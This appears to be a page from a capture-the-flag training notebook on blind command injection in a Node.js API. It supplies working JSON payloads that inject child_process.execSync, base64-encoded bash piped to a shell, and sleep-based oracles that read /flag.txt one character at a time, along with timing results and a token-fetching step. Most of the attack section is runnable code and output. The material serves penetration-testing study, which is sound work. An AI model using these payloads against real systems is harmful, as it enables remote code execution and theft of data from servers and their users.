Blind Exploitation

Overview

When HTTP response injection isn't possible, use time-based or boolean-based techniques to exfiltrate data.

Blind Exfiltration Methods

Method

Description

Sleep timers

If char matches → sleep X seconds

Boolean output

If char matches → different response

Note: Even completely blind, vulnerability is critical - commands still execute (DoS, ransomware, etc.)

Why Not JavaScript Sleep?

The Problem

setTimeout(() => {}, 2000);  // Doesn't work as expected

Node.js processes requests asynchronously - response returns immediately even if code still processing.

The Solution

Use system commands instead:

execSync waits for command completion
System sleep causes actual delay

Time-Based Exploitation

Test Sleep Works

time curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <TOKEN>" \
  -d "{ \"text\": \"'}) + require('child_process').execSync('sleep 2')//\" }" \
  http://localhost:5000/api/service/generate

Result:

real    0m2.035s  ← Matches sleep duration!

✅ Time-based exfiltration possible!

Reading Output via Sleep

The Technique

Read first character of command output
Compare against each ASCII character
If match → sleep 2 seconds
Repeat for all characters

Bash Command

command | head -c 1 | { read c; if [ "$c" = "a" ]; then sleep 2; fi; }

For Specific Position

# Character at position N
command | head -c N | tail -c 1 | { read c; if [ "$c" = "a" ]; then sleep 2; fi; }

Payload

{
  "text": "'}) + require('child_process').execSync('ls | head -c 1 | { read c; if [ \"$c\" = \"a\" ]; then sleep 2; fi; }')//"
}

Practical Exploitation

Step 1: Get Admin Token

curl -s -X POST \
  -H "Content-Type: application/json" \
  -d '{"email": "test@hackthebox.com"}' \
  http://<TARGET>/api/auth/authenticate

Step 2: Generate Payloads

# Generate base64 payloads for position 1, characters 0-5
for i in {0..5}; do
  echo -n "Character: $i    "
  echo -n "cat /flag.txt | head -c 1 | tail -c 1 | { read c; if [ \$c = $i ]; then sleep 2; fi; }" | base64 -w0
  echo
done

Step 3: Test Each Character

time curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <TOKEN>" \
  -d "{ \"text\": \"'}) + require('child_process').execSync('echo <BASE64> | base64 -d | bash')//\" }" \
  http://<TARGET>/api/service/generate

Step 4: Identify Match

Character 0: real 0m0.170s  ← No match
Character 1: real 0m0.169s  ← No match
Character 2: real 0m2.173s  ← MATCH! (2+ seconds)

Step 5: Move to Next Position

Change head -c 1 to head -c 2, then head -c 3, etc.

Example: Extracting 3-Digit Flag

Position 1

# Payloads for head -c 1
for i in {0..9}; do
  echo "cat /flag.txt | head -c 1 | tail -c 1 | { read c; if [ \$c = $i ]; then sleep 2; fi; }" | base64 -w0
done

Result: Character 2 causes delay

Position 2

# Payloads for head -c 2
for i in {0..9}; do
  echo "cat /flag.txt | head -c 2 | tail -c 1 | { read c; if [ \$c = $i ]; then sleep 2; fi; }" | base64 -w0
done

Result: Character 1 causes delay

Position 3

# Payloads for head -c 3
for i in {0..9}; do
  echo "cat /flag.txt | head -c 3 | tail -c 1 | { read c; if [ \$c = $i ]; then sleep 2; fi; }" | base64 -w0
done

Result: Character 4 causes delay

Flag: 214

Accuracy Considerations

Factor

Impact

Internet latency

False positives/negatives

Server load

Variable response times

Short delays

More errors

Recommendations

Use longer delays (2-3 seconds) for accuracy
Test known character first (e.g., H from HTB{)
Repeat on uncertain results

Boolean-Based Alternative

Instead of Sleep

Change HTTP response code or content based on match.

// If match → return 200, else → return 404
if (char === target) {
  return 200;
} else {
  return 404;
}

Advantages

Faster (no waiting)
More reliable

Disadvantages

Requires controllable response
Not always possible

Automation Needed

Why Manual Is Impractical

Full ASCII charset: 95 printable characters
Per character: 95 requests (worst case)
30 character output: 2850 requests
Manual: Hours of work

Solution

Write script to automate:

Character iteration
Request timing
Result collection

Key Takeaways

execSync + sleep - Reliable time-based exfiltration
head + tail - Extract specific character positions
Base64 encoding - Avoid escaping issues
Longer delays - More accuracy
Automation essential - Manual is impractical

PreviousHTTP Response Injection NextExploit Development

Last updated 15 days ago

hashtagOverview

hashtagBlind Exfiltration Methods

hashtagWhy Not JavaScript Sleep?

hashtagThe Problem

hashtagThe Solution

hashtagTime-Based Exploitation

hashtagTest Sleep Works

hashtagReading Output via Sleep

hashtagThe Technique

hashtagBash Command

hashtagFor Specific Position

hashtagPayload

hashtagPractical Exploitation

hashtagStep 1: Get Admin Token

hashtagStep 2: Generate Payloads

hashtagStep 3: Test Each Character

hashtagStep 4: Identify Match

hashtagStep 5: Move to Next Position

hashtagExample: Extracting 3-Digit Flag

hashtagPosition 1

hashtagPosition 2

hashtagPosition 3

hashtagAccuracy Considerations

hashtagRecommendations

hashtagBoolean-Based Alternative

hashtagInstead of Sleep

hashtagAdvantages

hashtagDisadvantages

hashtagAutomation Needed

hashtagWhy Manual Is Impractical

hashtagSolution

hashtagKey Takeaways